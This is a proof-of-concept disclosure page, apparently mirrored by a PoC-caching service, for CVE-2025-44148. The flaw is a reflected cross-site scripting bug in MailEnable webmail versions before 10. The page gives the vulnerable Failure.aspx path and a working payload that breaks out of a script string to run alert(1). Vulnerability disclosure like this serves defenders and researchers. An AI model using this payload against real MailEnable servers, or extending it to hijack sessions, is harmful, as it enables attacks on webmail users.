CVE-2025-44148 PoC — MailEnable 安全漏洞

Source

https://github.com/barisbaydur/CVE-2025-44148

Associated Vulnerability

Title:MailEnable 安全漏洞 (CVE-2025-44148)
Description:MailEnable是澳大利亚MailEnable公司的一个基于 Windows 的商业电子邮件服务器。 MailEnable v10之前版本存在安全漏洞，该漏洞源于failure.aspx组件存在跨站脚本，可能导致任意代码执行。

Description

A reflected cross-site scripting (XSS) vulnerability exists in MailEnable Webmail due to improper user input sanitization in the failure.aspx. This allows a remote attacker to inject arbitrary JavaScript code via a crafted URL, which is then reflected in the server's response and executed in the context of the user's browser session.

Readme

# CVE-2025-44148 - Reflected Cross-Site Scripting (Reflected XSS)
Reflected Cross-Site Scripting (XSS) in MailEnable<br/>
Vendor: MailEnable Pty. Ltd.<br/>
Affected Versions: <10

# Description
A reflected cross-site scripting (XSS) vulnerability exists in MailEnable Webmail due to improper user input sanitization in the failure.aspx. This allows a remote attacker to inject arbitrary JavaScript code via a crafted URL, which is then reflected in the server's response and executed in the context of the user's browser session.

# POC
- Go to **/Mondo/lang/sys/Failure.aspx?state=19753** Page
- Use **%22;}alert(1);function%20test(){%22** Paylaod for exploitation
<br/><br/>
![2](https://github.com/user-attachments/assets/3ff590f5-a5da-4b50-b36b-0982ee2e4600)

File Snapshot


 [4.0K]  /data/pocs/c5d8a49cdf3f778f3faca67177f0b9945f934792
└── [ 763]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!